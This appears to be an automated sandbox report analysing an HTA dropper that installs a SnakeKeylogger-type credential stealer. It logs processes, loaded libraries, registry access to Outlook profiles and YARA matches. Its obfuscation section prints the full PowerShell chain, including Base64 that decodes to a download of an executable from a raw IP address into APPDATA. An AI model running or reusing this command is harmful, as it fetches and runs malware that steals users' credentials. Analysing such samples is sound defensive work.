                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00962DD17_2_00962DD1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00967E687_2_00967E68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00964F087_2_00964F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_009634DD7_2_009634DD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0096B9D07_2_0096B9D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0096B9E07_2_0096B9E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00964EF87_2_00964EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00967E597_2_00967E59
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: String function: 00D28900 appears 42 times
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: String function: 00D20AE3 appears 70 times
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: String function: 00D07DE1 appears 35 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                    Source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@14/15@2/3
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6A06A GetLastError,FormatMessageW,6_2_00D6A06A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D581CB AdjustTokenPrivileges,CloseHandle,6_2_00D581CB
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_00D587E1
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,6_2_00D6B3FB
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D7EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,6_2_00D7EE0D
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6C397 CoInitialize,CoCreateInstance,CoUninitialize,6_2_00D6C397
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D04E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,6_2_00D04E89
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5w2zet0.25m.ps1
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: RegSvcs.exe, 00000007.00000002.2510723580.000000000351D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.00000000025E0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.0000000002603000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.00000000025EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.0000000002610000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: needagoodplanforsuccesstogetbackbest.htaVirustotal: Detection: 40%
                    Source: needagoodplanforsuccesstogetbackbest.htaReversingLabs: Detection: 27%
                    Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\needagoodplanforsuccesstogetbackbest.hta"
                    Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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'+[cHar]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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'+[cHar]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5CF.tmp" "c:\Users\user\AppData\Local\Temp\43swuu3x\CSC1706E7A7601C443B9125CD5A3AB1B1B7.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\csoss.exe "C:\Users\user\AppData\Roaming\csoss.exe"
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csoss.exe"
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: vbscript.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                    Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Binary string: wntdll.pdbUGP source: csoss.exe, 00000006.00000003.1394760413.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1395803435.0000000003970000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: csoss.exe, 00000006.00000003.1394760413.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1395803435.0000000003970000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: q:C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.pdb source: powershell.exe, 00000003.00000002.1400376615.0000000004B4A000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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'+[cHar]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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'+[cHar]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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'+[cHar]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzL